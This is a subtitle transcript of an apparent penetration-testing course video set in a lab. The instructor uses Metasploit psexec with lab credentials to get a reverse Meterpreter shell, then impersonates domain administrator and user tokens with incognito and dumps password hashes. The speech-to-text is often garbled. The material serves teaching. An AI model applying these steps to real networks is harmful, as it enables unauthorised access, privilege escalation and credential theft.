1
00:00:00,150 --> 00:00:06,190
Now to perform this attack with token impersonation we're first gonna have to use Metis flight.

2
00:00:06,280 --> 00:00:09,030
Let's go ahead and just type in MSF console.

3
00:00:09,210 --> 00:00:13,890
We're gonna load this guy up and then we're going to go ahead and search for P.S. exact.

4
00:00:13,890 --> 00:00:18,060
We're gonna get a shell on the Frank Cassell machine or the Punisher machine.

5
00:00:18,060 --> 00:00:26,620
So I'm just gonna say use exploit windows SMB is exact because I haven't memorized here and we're gonna

6
00:00:26,640 --> 00:00:34,570
say options and then we're gonna set our our hosts which should be the Punisher machine minds.

7
00:00:34,570 --> 00:00:37,140
Fifty seven one forty one.

8
00:00:37,150 --> 00:00:48,820
We're gonna set the SMB domain which is going to be Marvel local set S&amp;P pass as password one set SNB

9
00:00:48,820 --> 00:00:56,500
user as f Castle and let's go ahead and show targets once you have that all set up those a show targets

10
00:00:58,290 --> 00:01:05,640
and I'm going to do a native upload so we'll set target of 2 I'm going to type options here and I'll

11
00:01:05,640 --> 00:01:10,260
stall verbally just for a second so you can catch up if you need to but we're just making sure that

12
00:01:10,260 --> 00:01:16,470
everything is checked with our boxes we've got be right our host we've got the right domain password

13
00:01:16,530 --> 00:01:22,560
user native upload last thing we're gonna want to set the payload here because it's going to try to

14
00:01:22,560 --> 00:01:30,750
attack with a X 86 payloads we're gonna go ahead and say Windows X 64 and we'll say interpreter reverse

15
00:01:31,080 --> 00:01:42,610
DCP options set the L host here to eat zero and now we have options one more time it should look good

16
00:01:42,650 --> 00:01:48,920
we've got 1 2 1 6 8 fifty seven one thirty nine is the host that is us well OK let's try to run this

17
00:01:50,950 --> 00:01:59,200
and boom interpreter session right off the bat that's I love to see OK so now we have interpreter session

18
00:01:59,740 --> 00:02:04,150
we can do all the fun stuff elsewhere do you know Valerie we can do a hash jump we could say get you

19
00:02:04,150 --> 00:02:11,410
IP we can make sure we're system could say sis info get the system info we're on the right machine right

20
00:02:11,440 --> 00:02:14,060
architecture right everything this is great.

21
00:02:14,080 --> 00:02:16,830
Now there are a few things that we can do in here.

22
00:02:16,840 --> 00:02:23,740
One is we can go ahead and we can load a tool and if you load in double tab there's a few different

23
00:02:23,740 --> 00:02:26,030
things that we can use in here.

24
00:02:26,190 --> 00:02:34,290
Now we can load the tool that we're going to use which is incognito we can also use Kiwi which is a

25
00:02:34,290 --> 00:02:38,520
tool similar to many cats which is made for dumping passwords I'm going to talk about many cats here

26
00:02:38,520 --> 00:02:44,220
very very soon we can also load power shall I love this feature because sometimes if we get into a shell

27
00:02:44,220 --> 00:02:51,890
and we try to load power shell like if we go into a shell we say power shell whatever execution policy

28
00:02:51,930 --> 00:02:58,890
bypass and try to run that it doesn't always run this one's nice and neat for us it's not always like

29
00:02:58,890 --> 00:03:04,440
that so we're gonna go ahead and cancel this or exit out of this channel but we can load power shell

30
00:03:04,440 --> 00:03:06,320
into this and inject power shell as well.

31
00:03:06,330 --> 00:03:12,780
So these different features here are really nice but for this one I'm gonna go ahead and load the incognito

32
00:03:12,780 --> 00:03:18,270
feature and if we type help the last thing that we loaded is always at the bottom so if you ever want

33
00:03:18,270 --> 00:03:24,570
to see that down here incognito commands now I've had incognito come up on interviews before so this

34
00:03:24,570 --> 00:03:31,770
is a special one to note and just to understand what token impersonation is and why it's important so

35
00:03:32,280 --> 00:03:39,660
we have the ability here to impersonate a token once we have a token impersonated we can try to add

36
00:03:40,410 --> 00:03:46,860
add a user add group add local groups we can do all kinds of fun stuff for this example we're just gonna

37
00:03:46,860 --> 00:03:54,710
go ahead and just try to impersonate a user OK and I'm going to go ahead and just list the tokens and

38
00:03:54,740 --> 00:03:56,000
I'm going to do a dash you.

39
00:03:56,000 --> 00:03:58,640
You could do it by Dash you or dash G for groups.

40
00:03:58,640 --> 00:03:59,820
I always like to do it for Dash.

41
00:03:59,820 --> 00:04:08,220
You and you can see sitting on this machine here is Marvel administrator so if we want to impersonate

42
00:04:08,250 --> 00:04:14,130
this person all we have to say is impersonate token and then we're gonna go ahead and just say Marvel

43
00:04:15,720 --> 00:04:17,130
administrator.

44
00:04:17,130 --> 00:04:18,360
Just like that.

45
00:04:18,360 --> 00:04:23,720
You want to backslash is because of character escaping.

46
00:04:23,770 --> 00:04:26,110
Now we've impersonated this user.

47
00:04:26,110 --> 00:04:28,070
Go ahead and take Shel.

48
00:04:28,210 --> 00:04:29,510
Who am I.

49
00:04:29,510 --> 00:04:36,940
And you see now we are moral administrator so one thing to know it's control see exit out of this.

50
00:04:36,940 --> 00:04:40,390
We can go ahead and say it like you want to run hashed out.

51
00:04:40,390 --> 00:04:45,670
Now it's going to have issues and say access is denied because we're not actually running as the system

52
00:04:45,670 --> 00:04:46,700
of the machine.

53
00:04:46,720 --> 00:04:51,790
So if you're ever in this situation all you have to do is type read to self so you can revert to your

54
00:04:52,090 --> 00:04:57,490
old self who you came in as and then now you can run hash dump again and it'll work.

55
00:04:58,630 --> 00:05:00,870
So let's do one more proof of concept here.

56
00:05:00,870 --> 00:05:05,430
You saw the theme in the shooter was available for you it might have been your other user right.

57
00:05:05,440 --> 00:05:10,690
It's whoever is logged in currently I didn't instruct you with who to log in as so on my Windows 10

58
00:05:10,690 --> 00:05:14,500
machine right now I've got the Marvel administrator logged in.

59
00:05:14,570 --> 00:05:21,130
Let's go ahead and just sign in with F. Castle and let's just put in password 1 Get Frank all logged

60
00:05:21,130 --> 00:05:25,330
in here and get your other user logged in whoever it is.

61
00:05:25,330 --> 00:05:27,250
If you had somebody who impersonated.

62
00:05:27,250 --> 00:05:29,530
Go ahead and impersonate a different user here.

63
00:05:29,950 --> 00:05:38,440
So now we can come into this again and we can say list tokens stash you for user and guess you just

64
00:05:38,440 --> 00:05:39,750
showed up.

65
00:05:39,960 --> 00:05:41,400
Frank Castle why.

66
00:05:41,460 --> 00:05:46,780
This is a delegate token remember delegate tokens are on log in or RTP sessions.

67
00:05:46,890 --> 00:05:49,030
So we had a log in on this computer.

68
00:05:49,050 --> 00:05:54,020
Now we've got this token this token exists until the computer is rebooted.

69
00:05:54,210 --> 00:06:00,030
We can impersonate this user in till the computer is rebooted so we can go ahead and say impersonate

70
00:06:00,090 --> 00:06:06,620
token and say Marvel EFF castle like this should work.

71
00:06:06,670 --> 00:06:08,360
Go ahead and say Shel.

72
00:06:08,380 --> 00:06:09,460
Who am I.

73
00:06:09,460 --> 00:06:10,000
Guess what.

74
00:06:10,000 --> 00:06:11,570
Now we're afraid castle.

75
00:06:11,680 --> 00:06:12,840
This one is so cool.

76
00:06:12,850 --> 00:06:13,900
I will love this attack.

77
00:06:14,350 --> 00:06:15,490
So that's it.

78
00:06:15,490 --> 00:06:19,440
I just want you to get the feel for what you're capable of doing.

79
00:06:19,450 --> 00:06:26,680
We just took a user that was just happened to have left a token behind and this happens a lot.

80
00:06:26,680 --> 00:06:31,260
Think of an account where a server that you might log into or get access to.

81
00:06:31,450 --> 00:06:37,760
And there is a domain admin who logged into that computer and servers don't get rebooted that much.

82
00:06:37,870 --> 00:06:42,760
So if there's a domain Advent on that computer and they don't reboot very often that tokens sitting

83
00:06:42,760 --> 00:06:43,690
there until they reboot.

84
00:06:44,410 --> 00:06:47,460
So it's just moving laterally machine to machine.

85
00:06:47,460 --> 00:06:51,130
And so you find that way to escalate and this is a potential way to escalate.

86
00:06:51,580 --> 00:06:52,360
So that's it.

87
00:06:52,360 --> 00:06:57,300
We're going to move on to talk about the mitigation strategies for this and then we can talk about Kirby

88
00:06:57,300 --> 00:06:59,730
roasting which is one of my favorite attacks.

89
00:06:59,800 --> 00:07:01,720
So I'll go ahead and catch in the next video.